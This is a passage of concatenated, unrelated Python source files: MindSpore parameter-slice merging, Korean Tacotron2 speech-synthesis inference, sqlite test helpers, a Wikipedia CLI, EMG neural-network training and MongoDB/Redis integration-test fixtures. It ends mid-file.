strategy (dict): Parameter slice strategy.
is_even (bool): Slice manner that True represents slicing evenly and False represents slicing unevenly.
Returns:
Tensor, the merged Tensor which has the whole data.
Raises:
ValueError: Failed to merge.
"""
layout = strategy.get(parameter_name)
try:
dev_mat = list(layout.dev_matrix[0].dim)
tensor_map = list(layout.tensor_map[0].dim)
param_split_shape = list(layout.param_split_shape[0].dim)
field_size = int(layout.field)
except BaseException as e:
raise ValueError(f"{e.__str__()}. please make sure that strategy matches the node_strategy.proto.")
device_count = 1
for dim in dev_mat:
device_count *= dim
if len(sliced_data) != device_count:
raise ValueError(f"The sliced_parameters length should be equal to device_count. "
f"the sliced_parameters length is {len(sliced_data)} but device_count is {device_count}.")
merged_tensor = None
if not param_split_shape:
if not is_even:
raise ValueError("The shape of every parameter in sliced_parameters should be the same "
"when slice manner is even.")
all_gather_tensor = Tensor(np.concatenate(sliced_data))
if field_size > 0:
from mindspore.parallel._tensor import _reshape_param_data_with_weight
merged_tensor = _reshape_param_data_with_weight(all_gather_tensor, dev_mat, [field_size])
else:
from mindspore.parallel._tensor import _reshape_param_data
merged_tensor = _reshape_param_data(all_gather_tensor, dev_mat, tensor_map)
else:
from mindspore.parallel._tensor import _get_tensor_strategy, _get_tensor_slice_index
tensor_strategy = _get_tensor_strategy(dev_mat, tensor_map)
slice_count = 1
for dim in tensor_strategy:
slice_count *= dim
if len(param_split_shape) != slice_count:
raise ValueError(f"The param_split_shape length in strategy should be {slice_count}, "
f"but got {len(param_split_shape)}.")
tensor_slices_new = list(range(slice_count))
tensor_slices = sliced_data
for i in range(device_count):
slice_index = int(_get_tensor_slice_index(dev_mat, tensor_strategy, tensor_map, i))
if tensor_slices[i].shape[0] != param_split_shape[slice_index]:
raise ValueError(f"The slice {slice_index} is {param_split_shape[slice_index]} in 0 axis, "
f"but got {tensor_slices[i].shape[0]}.")
tensor_slices_new[slice_index] = np.array(tensor_slices[i])
dim_len = len(tensor_strategy)
for i in range(dim_len):
ele_count = int(len(tensor_slices_new) / tensor_strategy[dim_len - 1 - i])
tensor_slices_new_inner = []
for j in range(ele_count):
new_tensor = tensor_slices_new[j * tensor_strategy[dim_len - 1 - i]]
for l in range(j * tensor_strategy[dim_len - 1 - i] + 1,
(j + 1) * tensor_strategy[dim_len - 1 - i]):
new_tensor = np.concatenate((new_tensor, tensor_slices_new[l]), axis=dim_len - 1 - i)
tensor_slices_new_inner.insert(len(tensor_slices_new_inner), np.array(new_tensor))
tensor_slices_new = tensor_slices_new_inner
merged_tensor = Tensor(tensor_slices_new[0])
return merged_tensor
def build_searched_strategy(strategy_filename):
"""
Build strategy of every parameter in network.
Args:
strategy_filename (str): Name of strategy file.
Returns:
Dictionary, whose key is parameter name and value is slice strategy of this parameter.
Raises:
ValueError: Strategy file is incorrect.
TypeError: Strategy_filename is not str.
Examples:
>>> strategy_filename = "./strategy_train.ckpt"
>>> strategy = build_searched_strategy(strategy_filename)
"""
if not isinstance(strategy_filename, str):
raise TypeError(f"The strategy_filename should be str, but got {type(strategy_filename)}.")
if not os.path.isfile(strategy_filename):
raise ValueError(f"No such strategy file: {strategy_filename}.")
if os.path.getsize(strategy_filename) == 0:
raise ValueError("The strategy file should not be empty.")
parallel_strategy_map = ParallelStrategyMap()
with open(strategy_filename, 'rb') as f:
pb_content = f.read()
parallel_strategy_map.ParseFromString(pb_content)
layout_items = parallel_strategy_map.parallel_layout_item
if not layout_items:
raise ValueError("The strategy file has no sliced parameter.")
strategy = {}
for layout_item in layout_items:
parameter_name = layout_item.param_name
layout = layout_item.parallel_layouts
strategy[parameter_name] = layout
return strategy
def merge_sliced_parameter(sliced_parameters, strategy=None):
"""
Merge parameter slices to one whole parameter.
Args:
sliced_parameters (list[Parameter]): Parameter slices in order of rank_id.
strategy (dict): Parameter slice strategy, the default is None.
If strategy is None, just merge parameter slices in 0 axis order.
- key (str): Parameter name.
- value (<class 'node_strategy_pb2.ParallelLayouts'>): Slice strategy of this parameter.
Returns:
Parameter, the merged parameter which has the whole data.
Raises:
ValueError: Failed to merge.
TypeError: The sliced_parameters is incorrect or strategy is not dict.
KeyError: The parameter name is not in keys of strategy.
Examples:
>>> strategy = build_searched_strategy("./strategy_train.ckpt")
>>> sliced_parameters = [
>>> Parameter(Tensor(np.array([0.00023915, 0.00013939, -0.00098059])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00015815, 0.00015458, -0.00012125])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00042165, 0.00029692, -0.00007941])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00084451, 0.00089960, -0.00010431])),
>>> "network.embedding_table")]
>>> merged_parameter = merge_sliced_parameter(sliced_parameters, strategy)
"""
if not isinstance(sliced_parameters, list):
raise TypeError(f"The sliced_parameters should be list, but got {type(sliced_parameters)}.")
if not sliced_parameters:
raise ValueError("The sliced_parameters should not be empty.")
if strategy and not isinstance(strategy, dict):
raise TypeError(f"The strategy should be dict, but got {type(strategy)}.")
try:
parameter_name = sliced_parameters[0].name
parameter_shape = sliced_parameters[0].data.shape
parameter_shape_length = len(parameter_shape)
except BaseException as e:
raise TypeError(f"{e.__str__()}. the element in sliced_parameters should be Parameter.")
is_even = True
for index, parameter in enumerate(sliced_parameters):
if not isinstance(parameter, Parameter):
raise TypeError(f"The element in sliced_parameters should be Parameter, "
f"but got {type(parameter)} at index {index}.")
if parameter.name != parameter_name \
or len(parameter.data.shape) != parameter_shape_length \
or parameter.data.shape[1:] != parameter_shape[1:]:
raise ValueError("Please make sure that the elements in slice_parameters have the same name, "
"dimension length and shape except 0 axis")
if parameter.data.shape != parameter_shape:
is_even = False
layerwise_parallel = sliced_parameters[0].layerwise_parallel
requires_grad = sliced_parameters[0].requires_grad
sliced_data = [parameter.data.asnumpy() for parameter in sliced_parameters]
merged_parameter = None
if not strategy:
merged_tensor = Tensor(np.concatenate(sliced_data))
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
else:
if parameter_name not in strategy.keys():
raise KeyError(f"The parameter name should be one key of strategy. "
f"the parameter name is {parameter_name}.")
merged_tensor = _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even)
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
return merged_parameter
|
inference.py | ## 기본 라이브러리 Import
import sys
import numpy as np
import torch
import os
import argparse
## WaveGlow 프로젝트 위치 설정
sys.path.append('waveglow/')
## Tacontron2 프로젝트 위치 설정
sys.path.append('tacotron2/')
## 프로젝트 라이브러리 Import
from hparams import defaults
from model import Tacotron2
from layers import TacotronSTFT, STFT
from audio_processing import griffin_lim
from tacotron2.train import load_model
from text import text_to_sequence
from scipy.io.wavfile import write
import IPython.display as ipd
import json
from waveglow.glow import WaveGlow
from denoiser import Denoiser
from tqdm.notebook import tqdm
import soundfile as sf
import yaml
import torch.distributed as dist
from torch.multiprocessing import Process
def run(rank, size):
""" Distributed function to be implemented later. """
pass
def init_processes(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
# dist.init_process_group(backend, init_method='tcp://10.1.1.20:23456', rank=rank, world_size=size)
fn(rank, size)
## dict->object 변환용
class Struct:
def __init__(self, **entries):
self.__dict__.update(entries)
def load_checkpoint(checkpoint_path, model):
assert os.path.isfile(checkpoint_path)
checkpoint_dict = torch.load(checkpoint_path, map_location='cpu')
model_for_loading = checkpoint_dict['model']
model.load_state_dict(model_for_loading.state_dict())
return model
class Synthesizer:
def __init__(self, tacotron_check, waveglow_check):
hparams = Struct(**defaults)
hparams.n_mel_channels = 80
hparams.sampling_rate = 22050
hparams.distributed_run = False
self.hparams = hparams
model = load_model(hparams)
model.load_state_dict(torch.load(tacotron_check)['state_dict'])
model.cuda().eval() # .half()
self.tacotron = model
with open('waveglow/config.json') as f:
data = f.read()
config = json.loads(data)
waveglow_config = config["waveglow_config"]
waveglow = WaveGlow(**waveglow_config)
waveglow = load_checkpoint(waveglow_check, waveglow)
waveglow.cuda().eval()
self.denoiser = Denoiser(waveglow)
self.waveglow = waveglow
def inference(self, text):
assert type(text) == str, "텍스트 하나만 지원합니다."
sequence = np.array(text_to_sequence(text, ['korean_cleaners']))[None, :]
sequence = torch.autograd.Variable(torch.from_numpy(sequence)).cuda().long()
mel_outputs, mel_outputs_postnet, _, alignments = self.tacotron.inference(sequence)
with torch.no_grad():
audio = self.waveglow.infer(mel_outputs_postnet, sigma=0.666)
audio = audio[0].data.cpu().numpy()
return audio, self.hparams.sampling_rate
## \n으로 구성된 여러개의 문장 inference 하는 코드
def inference_phrase(self, phrase, sep_length=4000):
texts = phrase.split('\n')
audios = []
for text in texts:
if text == '':
audios.append(np.array([0] * sep_length))
continue
audio, sampling_rate = self.inference(text)
audios.append(audio)
audios.append(np.array([0] * sep_length))
return np.hstack(audios[:-1]), sampling_rate
def denoise_inference(self, text, sigma=0.666):
assert type(text) == str, "텍스트 하나만 지원합니다."
sequence = np.array(text_to_sequence(text, ['korean_cleaners']))[None, :]
sequence = torch.autograd.Variable(torch.from_numpy(sequence)).cuda().long()
mel_outputs, mel_outputs_postnet, _, alignments = self.tacotron.inference(sequence)
with torch.no_grad():
audio = self.waveglow.infer(mel_outputs_postnet, sigma=0.666)
audio_denoised = self.denoiser(audio, strength=0.01)[:, 0].cpu().numpy()
return audio_denoised.reshape(-1), self.hparams.sampling_rate
if __name__ == "__main__":
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.INFO)
# stream_handler = logging.StreamHandler()
# logger.addHandler(stream_handler)
# size = 2
# processes = []
# for rank in range(size):
# p = Process(target=init_processes, args=(rank, size, run))
# p.start()
# processes.append(p)
#
# for p in processes:
# p.join()
with open('config.yaml') as f:
config = yaml.load(f)
## 체크포인트 설정
tacotron2_checkpoint = config['tacotron2_checkpoint']
waveglow_checkpoint = config['waveglow_checkpoint']
## 음성 합성 모듈 생성
synthesizer = Synthesizer(tacotron2_checkpoint, waveglow_checkpoint)
# ## 문장 생성
sample_text = config['sample_text']
audio, sampling_rate = synthesizer.inference(sample_text)
## 음성 저장하기
sf.write('result.wav', audio, sampling_rate)
#
# ## 구문 생성
# sample_phrase = """
# 타코트론 모델은 음성 생성 길이가 제한되어 있습니다.
# 즉 구문을 구성하려면 여러개의 문장을 생성한 후 합쳐야 합니다.
# """
# audio, sampling_rate = synthesizer.inference_phrase(sample_phrase)
# ## 음성 저장하기
# sf.write('구문.wav', audio, sampling_rate)
|
utils.py | # -*- coding: utf-8 -*-
import os
import time
import signal
import platform
import multiprocessing
from contextlib import closing
import sqlite3
import pytest
from usql.main import special
DATABASE = os.getenv("PYTEST_DATABASE", "test.sqlite3")
def db_connection(dbname=":memory:"):
conn = sqlite3.connect(database=dbname, isolation_level=None)
return conn
try:
db_connection()
CAN_CONNECT_TO_DB = True
except Exception as ex:
CAN_CONNECT_TO_DB = False
dbtest = pytest.mark.skipif(
not CAN_CONNECT_TO_DB, reason="Error creating sqlite connection"
)
def create_db(dbname):
with closing(db_connection().cursor()) as cur:
try:
cur.execute("""DROP DATABASE IF EXISTS _test_db""")
cur.execute("""CREATE DATABASE _test_db""")
except:
pass
def drop_tables(dbname):
with closing(db_connection().cursor()) as cur:
try:
cur.execute("""DROP DATABASE IF EXISTS _test_db""")
except:
pass
def run(executor, sql, rows_as_list=True):
"""Return string output for the sql to be run."""
result = []
for title, rows, headers, status in executor.run(sql):
rows = list(rows) if (rows_as_list and rows) else rows
result.append(
{"title": title, "rows": rows, "headers": headers, "status": status}
)
return result
def set_expanded_output(is_expanded):
"""Pass-through for the tests."""
return special.set_expanded_output(is_expanded)
def is_expanded_output():
"""Pass-through for the tests."""
return special.is_expanded_output()
def send_ctrl_c_to_pid(pid, wait_seconds):
"""Sends a Ctrl-C like signal to the given `pid` after `wait_seconds`
seconds."""
time.sleep(wait_seconds)
system_name = platform.system()
if system_name == "Windows":
os.kill(pid, signal.CTRL_C_EVENT)
else:
os.kill(pid, signal.SIGINT)
def send_ctrl_c(wait_seconds):
"""Create a process that sends a Ctrl-C like signal to the current process
after `wait_seconds` seconds.
Returns the `multiprocessing.Process` created.
"""
ctrl_c_process = multiprocessing.Process(
target=send_ctrl_c_to_pid, args=(os.getpid(), wait_seconds)
)
ctrl_c_process.start()
return ctrl_c_process
|
wiki.py | #!/usr/bin/python
#coding=utf-8
import os,sys,warnings,requests,time,urllib,threading,csv
import wikipedia as wiki
from PIL import Image
from io import BytesIO
from locale import getdefaultlocale
warnings.filterwarnings('ignore')
try:
langue=getdefaultlocale()
langue=langue[0]
langue=langue.split("_")
l=str(langue[0])
except:
print("Chikapedia failed to get your computer's Langue.")
print("Switching bacc default langue which is English.")
l="en"
wiki.set_lang(l)
try:
if l=="tr":
l_wiki="Wikide ara: "
l_how_many="Kaç sonuç: "
l_search="Ara: "
l_num="Numara gir: "
l_learn_more="Resim görmek ve daha fazla öğrenmek istermisin? (E/H)"
l_exit=f"Çıkmak için küçük harfle çık.\nProgramı yeniden çalıştırmak için herhangi bişey yazın:\n"
else:
l_wiki="wiki: "
l_how_many="How Many results you want to see: "
l_search="Search: "
l_num="Enter a number: "
l_learn_more="Would you like to see pictures and learn more? (Y/N)"
l_exit=f"Type quit to exit or anything else to restart the program\n:"
except:
os._exit(1)
def k():
print("-------------------------------------------")
def x():
try:
while True:
clear()
print("Yes my Lord!")
feed=str(input(l_wiki))
if feed=="quit" or feed=="çıkış" or feed=="exit" or feed=="q" or feed=="çık":
os._exit(1)
result=int(input(l_how_many))
k()
v=wiki.search(feed,results=result)
n=0
for s in v:
#print(f" {v[n]}")# 1-) XXXXXXXX
print('['+str(n)+']''-'+v[n])
n+=1
k()
n_index=int(input(l_num))
target_info=v[int(n_index)]
#ara=str(input(l_search))
k()
new_info=wiki.summary(target_info, auto_suggest=True, redirect=True)
print(f"{new_info}")
k()
ans=str(input(l_learn_more))
ans=ans.lower()
if ans.startswith("y") or ans.startswith("e"):
clear()
s=wiki.WikipediaPage(title=target_info,redirect=True,preload=True)
cont=s.content
imgs=s.images
print(cont)
with open("Last Article.txt","w",encoding='UTF-8') as f:#Write content to file
w = csv.writer(f,delimiter=",",lineterminator="\n")
w.writerow([cont])
img_num=0
for i in imgs:
try:
url=imgs[img_num]
urllib.request.urlretrieve(url, f"Last Article Picture {img_num}.jpg")#For Downloading Pictures to same directory uncomment to activate.
img_num+=1
time.sleep(1)
response = requests.get(url)
img = Image.open(BytesIO(response.content))
img.show()
except:
time.sleep(1)
continue
stat=input(l_exit)
if stat=="quit" or stat=="çık":
os._exit(1)
else:
continue
except:
pass
def clear():
if os.name=='nt':
_=os.system('cls')
else:
_=os.system('clear')
if __name__ == "__main__":
threading.Thread(target=x).start() |
EMG_DPNN.py | # -*- coding: utf-8 -*-
"""
Created on Fri Aug 24 09:40:28 2018
@author: Paulo Augusto
"""
import numpy as np
#from numpy import fft
import matplotlib.pyplot as plt
#import scipy.signal as sig
import os
import random
import emgReaderClass_v2 as erc
import threading
import multiprocessing
#import dataPlotter
import snkbrain
import scipy.stats as st
import cProfile
import re
# This script is compatible with 'emgReaderClass_v2', that
# reads the .csv files generated by 'movementSaver.m', from
# the folder './csv/'
profiling=False
bias=0 # If bias = 1, every cromossome will have a non frequency dependant DNA
maxGen=2000 # The max number of generations
startOver=True# If True, the code will not consider the last simulation
tamPop=30 # Population number
maxFreq=240 # This is the max Frequency to consider #240
freqStep=3 # For freqStep=3 -> The code will consider [1,2,3],[3,4,5], etc# 3
sourceType='ninapro'
ninaprofolders=['csv1','csv2','csv3','csv6','csv7','csv8']
fs=2000
##############################################################################
guid=0 # Individual ID (logging variable)
log_val,log_train,log_test=[],[],[]
param=[]
real=[] # DATA
origin=[] # DATA
fv=[] # DATA
frv=[] # DATA
max_freq=240
min_freq=6
curtose = st.kurtosis
obliquidade = st.skew
variancia = np.var
media = np.mean
desvio_padrao = np.std
def rms(v):
temp=sum([pow(i,2) for i in v])
return np.sqrt(temp/len(v))
def centroide_espectral(v):
temp=v
n = sum([i*value for i,value in zip(range(1,1+len(temp)),temp)])
mass_center = float(n)/sum(temp)
return mass_center
def feature_scaling(v):
mean = np.mean(v)
temp = [a-mean for a in v]
return temp/desvio_padrao(v)
#def get_parameters(timeValues,freqValues):
# global max_freq,min_freq
# max_i=int(max_freq*len(freqValues)/fs)
# min_i=int(min_freq*len(freqValues)/fs)
# mf=np.max([abs(a) for a in freqValues[min_i:max_i]])
# mt=np.max([abs(a) for a in timeValues[min_i:max_i]])
# imp_freq=[a*2/(len(freqValues)) for a in freqValues[min_i:max_i]]
# imp_freq=freqValues
# tyme=[a/(1000) for a in timeValues]
#
# temp=[curtose(tyme),
# obliquidade(tyme),
# variancia(tyme),
# media(tyme),
# desvio_padrao(tyme),
# rms(tyme)]
# return temp
def get_parameters(timeValues,freqValues):
# maxt=np.max(timeValues)
# maxf=np.max(freqValues)
# freq=[a*2/(len(freqValues)) for a in freqValues]
freq=[a/(1000) for a in freqValues]
tyme=[a/(1000) for a in timeValues]
# freq=[a/(maxf) for a in freqValues]
# tyme=[a/(maxt) for a in timeValues]
temp=[curtose(tyme),
obliquidade(tyme),
variancia(tyme),
media(tyme),
desvio_padrao(tyme),
# rms(tyme),
centroide_espectral(freq)/10,
curtose(freq),
obliquidade(freq),
variancia(freq),
media(freq),
desvio_padrao(freq),
rms(freq)]
return temp
# Individual class
class ind:
def __init__(self,layers,biases):
global guid
self.uid=guid
guid+=1
self.fit=-1000
self.brain=snkbrain.brain(layers,biases)
def getParameters():
global param
param=[[get_parameters(realV,freqV) for realV,freqV in zip(sr,sf)] for sr,sf in zip(real,frv)]
# param=[[get_parameters(realV,freqV) for realV,freqV in zip(sr,sf)] for sr,sf in zip(real,frv)]
def feature_scaling_all():
global flx_train,flx_test,ext_train,ext_test
data_sets=[flx_train,flx_test,ext_train,ext_test]
all_data=[]
for data_set in data_sets:
for arq in data_set:
for data in arq:
for data_piece in data:
all_data.append(data_piece)
dp=desvio_padrao(all_data)
mn=media(all_data)
print dp,mn
for i in range(0,len(data_sets)):
for j in range(0,len(data_sets[i])):
for k in range(0,len(data_sets[i][j])):
data_sets[i][j][k]=(data_sets[i][j][k]-mn)/dp
# This function takes the fft data od an signal, and returns a similar vector,
# but instead of getting one element per frequency it take a number of freqStep
# frequencies, sum it and divide by freqStep
def getFreqVector(fv):
x=[]
tam=float(len(fv))
norm=int(np.ceil(tam*1/fs))
step=freqStep*norm
for j in range(0,norm*maxFreq,step):
x.append(sum(fv[j:j+step])*2/tam)
return x
def adjust(v):
max_freq=240
min_freq=6
max_i=int(max_freq*len(v)/fs)
min_i=int(min_freq*len(v)/fs)
v=v[min_i:max_i]
# Read the data archives. The original signal is stored in origin. Each signal
# Is stored in real. real[arq][5] will contain the 5th signal of the arq'th file
# (as read by getArqs). The fft data will be stored at "fv" (indexes works the
# the same as for "real"). The frequency vector as got by getFrequencyVector
# is stored at frv
def readArqs(source,muscle,interval):
it=interval
reader=erc.emgReader()
global real,fv,frv
if source=='ninapro':
global ninaprofolders
realt,fvt=[],[]
for folder in ninaprofolders:
realt.append([])
fvt.append([])
realt[-1],fvt[-1]=reader.getCsvData(muscle,folder)
for arq in range(0,len(realt[0])):
real.append([])
fv.append([])
for r,f in zip(realt,fvt):
real[arq].extend(r[arq][ it[0]:it[1] ])
fv[arq].extend(f[arq][ it[0]:it[1] ])
training=[18-1,21-1,22-1,25-1,26-1,31-1]
real=[real[i] for i in training]
fv=[fv[i] for i in training]
frv=[[getFreqVector(rep) for rep in arq]for arq in fv]
# for arq in range(0,len(fv)):
# frv.append([])
# for i in range(0,len(fv[arq])):
# frv[arq].append(getFreqVector(fv[arq][i]))
# Fitness method. Each signal frequency vector is multiplied by indiv
# chromossome. The numbers got are reconized as the score of each archive.
# Let's say that the 0th element gets the largest number. That mean this
# individual "thinks" that that signal belongs to archive 4 (getArqs()[0])
# The fitness is then calculated by the number of right guesses of each
# individual
def fitness(indiv,dp=False,indivs=None):
global nArq
score=0
for arq in range(0,len(param)):
for i in range(0,len(param[arq])):
tam=len(param[arq][i])
# inpt=frv[arq][i]
if not dp:
inpt=param[arq][i]
else:
l,o1=indivs[0].brain.run(ext_train[arq][i])
l,o2=indivs[1].brain.run(flx_train[arq][i])
inpt=[a for a in o1]
inpt.extend([a for a in o2])
l,pont= indiv.brain.run(inpt)#np.array(frv[arq][i])*indiv.cromo.freqFactor
def error(pont,ref):
score=0
for i in range(0,len(pont)):
if i==ref:
t=1
else:
t=0
score+= t * np.log(pont[i]) + (1-t) * np.log(1-pont[i])
# score+= t*np.log((pont[i]+1)/2)+(1-t)*np.log(1-(pont[i]+1)/2)
return score
score+=error(pont,arq)
return score
def trainSomeone(indiv,number,learning_rate):
global param
count=0
while count<number:
for arq in range(0,len(param)):
for i in range(0,len(param[arq])):
target=[0,0,0,0,0,0]
target[arq]=1
indiv.brain.train(param[arq][i],target,learning_rate)
count+=1
def trainSomeone_2(rn,indiv1,indiv2,number,learning_rate):
global param
count=0
while count<number:
for arq in range(0,len(param)):
for i in range(0,len(param[arq])):
target=[0,0,0,0,0,0]
target[arq]=1
l,o1=indiv1.brain.run(ext_train[arq][i])
l,o2=indiv1.brain.run(flx_train[arq][i])
f=[a for a in o1]
f.extend([a for a in o2])
# f=[0,0,0, 0,0,0, 0,0,0, 0,0,0]
# f[arq],f[arq+6]=1,1
rn.brain.train(f,target,learning_rate)
count+=1
# Ver acertos
def get_score(ind,data):
score=0
total=0
for arq in range(0,len(data)):
for i in range(0,len(data[arq])):
total+=1
l,o=ind.brain.run(data[arq][i])
if np.argmax(o)==arq:
score+=1
return float(score)/total
#score=0
#total=0
#for arq in range(0,len(real)):
# for i in range(0,len(fv[arq])):
# total+=1
# l,o1=a.brain.run(ext_test[arq][i])
# l,o2=b.brain.run(flx_test[arq][i])
# f=[j for j in o1]
# f.extend([j for j in o2])
# l,o=c.brain.run(f)
# if np.argmax(o)==arq:
# score+=1
# else:
# print arq,i
#print score,' de ',total
def treinar(ind,init_lr,goal,dp=False,indivs=None):
global bestAll,tamPop
last=-1000
count=0
lr=init_lr
errorcount=0
flag=0
f=-1000
lastbrain=[a.copy() for a in ind.brain.brainMatrixes]
while f<goal:
f=fitness(ind,dp=dp,indivs=indivs)
if last>f:
lr/=1.1
errorcount+=1
ind.brain.brainMatrixes=lastbrain
else:
lastbrain=[a.copy() for a in ind.brain.brainMatrixes]
errorcount=0
count+=1
if count==11:
lr*=1.03
count=0
if errorcount==3:
if flag>=3:
print 'to many errors'
break
else:
flag+=1
lr=init_lr
errorcount=0
if dp:
trainSomeone_2(ind, indivs[0],indivs[1],10,lr)
else:
trainSomeone(ind,100,lr)
last = f
print f,lr#,get_score(ind,ext_train),get_score(ind,ext_test)
return lr
def treinar_v(a,init,reset_log=False):
global ext_train,flx_train,ext_test,flx_test,param,param_test,param_vald,log_vald,log_train,log_test,ind_count
if reset_log:
log_vald,log_train,log_test=[],[],[]
concatenate(ext_test,flx_test)
# param_vald=[[[data for data in rep] for rep in arq[::2]] for arq in param]
param_test=[[[data for data in rep] for rep in arq] for arq in param]
# log_vald.append([])
log_train.append([])
log_test.append([])
concatenate(ext_train,flx_train)
count=0.0
while count<3000:
count+=1
if count%100==0:
print 'Log numero ',len(log_train),' ',count/30,'% completo'
log_train[-1].append(get_score(a,param))
# log_vald[-1].append(get_score(a,param_vald))
log_test[-1].append(get_score(a,param_test))
# print get_score(a,param),get_score(a,param_vald),get_score(a,param_test)
trainSomeone(a,5,init)
def search_candidates():
global inds
inds=[]
inds.append(ind([24,24,6],[1,1,0]))
inds.append(ind([24,20,6],[1,1,0]))
inds.append(ind([24,16,6],[1,1,0]))
inds.append(ind([24,12,6],[1,1,0]))
inds.append(ind([24,16,6],[1,0,0]))
inds.append(ind([24,24,20,6],[1,1,1,0]))
inds.append(ind([24,20,16,6],[1,1,1,0]))
inds.append(ind([24,16,12,6],[1,1,1,0]))
inds.append(ind([24,20,16,6],[1,0,0,0]))
for indiv in inds:
treinar_v(indiv,0.005)
ind_count+=1
#def get_all_parameters():
#
# global flx_train,flx_test,ext_train,ext_test
#
# def a1():
# global ext_test
# r1,f1=readArqs('ninapro','ext',[3,6])
# ext_test=getParameters(r1,f1)
# print 'done'
#
# def a2():
# global flx_test
# r2,f2=readArqs('ninapro','flx',[3,6])
# flx_test=getParameters(r2,f2)
# print 'done'
#
# def a3():
# global ext_train
# r3,f3=readArqs('ninapro','ext',[0,3])
# ext_train=getParameters(r3,f3)
# print 'done'
#
# def a4():
# global flx_train
# r4,f4=readArqs('ninapro','flx',[0,3])
# flx_train=getParameters(r4,f4)
# print 'done'
#
# threading.Thread(target=a1).start()
# threading.Thread(target=a2).start()
# threading.Thread(target=a3).start()
# threading.Thread(target=a4).start()
def concatenate(v1,v2):
global param
param=[[[data for data in rep] for rep in arq] for arq in v1]
for i in range(0,len(v2)):
for j in range(0,len(v2[i])):
param[i][j].extend(v2[i][j])
def get_all_parameters():
global flx_train,flx_test,ext_train,ext_test
readArqs('ninapro','flx',[0,6])
getParameters()
flx_test= [[[data for data in rep] for rep in arq if arq.index(rep)%3==2] for arq in param]
flx_train= [[[data for data in rep] for rep in arq if not arq.index(rep)%3==2] for arq in param]
# readArqs('ninapro','flx',[3,6])
# getParameters()
# flx_test=[[[data for data in rep] for rep in arq] for arq in param]
readArqs('ninapro','ext',[0,6])
getParameters()
ext_test=[[[data for data in rep] for rep in arq if arq.index(rep)%3==2 ] for arq in param]
ext_train= [[[data for data in rep] for rep in arq if not arq.index(rep)%3==2] for arq in param]
feature_scaling_all()
# readArqs('ninapro','ext',[3,6])
# getParameters()
# ext_test=[[[data for data in rep] for rep in arq] for arq in param]
def print_all():
global log_train,log_test
for i in range(0,len(log_test)):
plt.figure()
plt.plot(range(0,len(log_train[i])*5,5),log_train[i],'r')
plt.plot(range(0,len(log_test[i])*5,5),log_test[i],'b')
plt.grid()
plt.title('NN Topology '+chr(ord('a')-32+i))
plt.legend(['Training','Testing'])
plt.grid(True)
plt.xlabel('Epoch')
plt.ylabel('Percentage')
movs=[18,21,22,25,26,31]
m=''
for n in movs:
m+=str(n)+'_'
plt.savefig(m+chr(ord('a')-32+i)+'.png')
if profiling:
cProfile.run('main()')
else:
1
# main()
|
integration_test_support.py | """
This module provides a IntegrationTestServerFixture which runs a
IntegrationTestServer on "http://127.0.0.1:5000/".
"""
import atexit
import os
import shutil
import subprocess
import tempfile
import time
from multiprocessing import Process
from time import sleep
import pymongo
import redis
import requests
from pyfix import Fixture
from pymongo.errors import ConnectionFailure
import integrationtest_utils
from aries.core.db import mongodb
from aries.core.db.mongodb import MongoDB
from aries.core.event.event_queue import EventQueue
MONGODB_TEST_PORT = 12345
REDIS_TEST_PORT = 12346
os.environ['MONGO_URI'] = 'mongodb://mongo:27017'
os.environ['REDIS_HOST'] = 'redis'
os.environ['REDIS_PORT'] = '6379'
import aries.api.webapp as webapp
class IntegrationTestServer(object):
def __init__(self):
mongodb_client = MongoTemporaryInstance.get_instance().client
redis_client = RedisTemporaryInstance.get_instance().client
self.event_queue = EventQueue(redis=redis_client)
self.storage = MongoDB(client=mongodb_client)
sleep(1)
app = webapp.create_app()
self._process = Process(target=app.run)
self._process.start()
sleep(1)
def stop(self):
self._process.terminate()
def get_page(self, url):
return requests.get('http://127.0.0.1:5000' + url)
def post_page(self, url, data):
return requests.post(url='http://127.0.0.1:5000' + url, json=data)
class IntegrationTestServerFixture(Fixture):
def reclaim(self, integration_test_server):
integration_test_server.stop()
def provide(self):
return [IntegrationTestServer()]
class MongoTemporaryInstance(object):
"""Singleton to manage a temporary MongoDB instance
Use this for testing purpose only. The instance is automatically destroyed
at the end of the program.
"""
_instance = None
@classmethod
def get_instance(cls):
if cls._instance is None:
cls._instance = cls()
atexit.register(cls._instance.shutdown)
return cls._instance
def __init__(self):
if integrationtest_utils.mongodb_test_url():
self._client = pymongo.MongoClient(integrationtest_utils.mongodb_test_url())
self._client.drop_database(mongodb.DATABASE)
else:
self._tmpdir = tempfile.mkdtemp()
self._process = subprocess.Popen(['mongod', '--bind_ip', 'localhost',
'--port', str(MONGODB_TEST_PORT),
'--dbpath', self._tmpdir,
'--nojournal',
'--noauth', '--smallfiles',
'--syncdelay', '0',
'--maxConns', '10',
'--nssize', '1', ],
stdout=open(os.devnull, 'wb'),
stderr=subprocess.STDOUT)
# XXX: wait for the instance to be ready
# Mongo is ready in a glance, we just wait to be able to open a
# Connection.
for i in range(3):
time.sleep(0.1)
try:
self._client = pymongo.MongoClient('localhost', MONGODB_TEST_PORT)
except ConnectionFailure:
continue
else:
break
else:
self.shutdown()
assert False, 'Cannot connect to the mongodb test instance'
@property
def client(self):
return self._client
def shutdown(self):
if self._process:
self._process.terminate()
self._process.wait()
self._process = None
shutil.rmtree(self._tmpdir, ignore_errors=True)
class RedisTemporaryInstance(object):
"""Singleton to manage a temporary Redis instance
Use this for testing purpose only. The instance is automatically destroyed
at the end of the program.
"""
_instance = None
@classmethod
def get_instance(cls):
if cls._instance is None:
cls._instance = cls()
atexit.register(cls._instance.shutdown)
return cls._instance
def __init__(self):
if integrationtest_utils.redis_test_url():
self._client = redis.Redis(integrationtest_utils.redis_test_url(), integrationtest_utils.redis_test_port())
else:
self._tmpdir = tempfile.mkdtemp()
self._process = subprocess.Popen(['redis-server',
'--port', str(REDIS_TEST_PORT)],
stdout=open(os.devnull, 'wb'),
stderr=subprocess.STDOUT)
# XXX: wait for the instance to be ready
# Redis is ready in a glance, we just wait to be able to open a
# Connection.
for i in range(3):
time.sleep(0.1)
try:
